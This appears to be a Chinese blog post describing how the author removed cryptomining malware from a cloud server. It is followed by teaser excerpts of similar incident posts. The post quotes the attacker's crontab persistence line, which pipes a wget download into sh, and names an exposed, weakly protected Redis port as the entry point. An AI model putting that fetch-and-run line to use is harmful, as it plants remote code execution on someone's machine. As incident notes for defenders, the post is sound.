這兩天先後收到阿里雲的兩條簡訊,一次提示有挖礦程式;一次提示伺服器上的crontab被改了。中間隔了1天。剛開始我還沒有引起注意,看到有挖礦程式的時候,用top檢視到有mined的程序,就直接kill掉了,後來又遇到的時候,發現不對啊,有兩個特別佔cpu的程序,分別是qw3xt.2和ddgs.3013。確定是挖礦程序無疑了。
1.使用top檢視占用cpu高的程序,發現qw3xt.2占用將近200%,然後kill掉
2.kill 之後,發現過一會又起來,執行crontab -e
發現有乙個定時操作,/15 * wget -q -o- | sh
每15秒執行一次。這個就是對應了第二條簡訊,crontab被修改了。這裡進行刪除
3.在/tmp目錄下,檢視到有兩個檔案,乙個是ddgs.2013和qw3xt.2。刪除這兩個檔案
這一次出現這個問題的原因是:redis埠6379暴露在外了,誰都可以連線;另乙個原因是6379設定的密碼過於簡單。
記一次伺服器被攻擊經歷
從接手公司伺服器兩個半星期經常性的無法正常ssh登陸,十次裡面有九次半都是顯示 ssh exchange identification read connection reset by peer 也谷歌很多種原因和解決方案,無非是分兩種 一是執行緒滿了,需要更改配置檔案把max session 調大...
記一次公司linux伺服器被挖礦
centos7.6 有些問題不是我遇到的 也一併記錄 伺服器執行緩慢,cpu飆公升,top一下,懷疑是挖礦程式.這個病毒還不是算很 很多挖礦病毒,使用top命令都看不到挖礦程式的程序。執行命令ps aux sort pcpu head 10 基本確定就是這兩程序了 kill 9 pid 基本沒用,肯...
記 第一次伺服器被挖礦
搭建了那麼多台伺服器,終於有人來搞我了。還有點小激動是怎麼一回事 首先發現的,還是公司裡乙個主管網路的大佬。他盯著公司裡每乙個ip的上下行,然後發現 哎呀,這個機子有點不對勁啊。遂通知主管,然後就到我這裡了。然後,由於本人的linux知識還是太匱乏,書到用時方恨少,排查問題多彎路啊,唉。然後我突然想...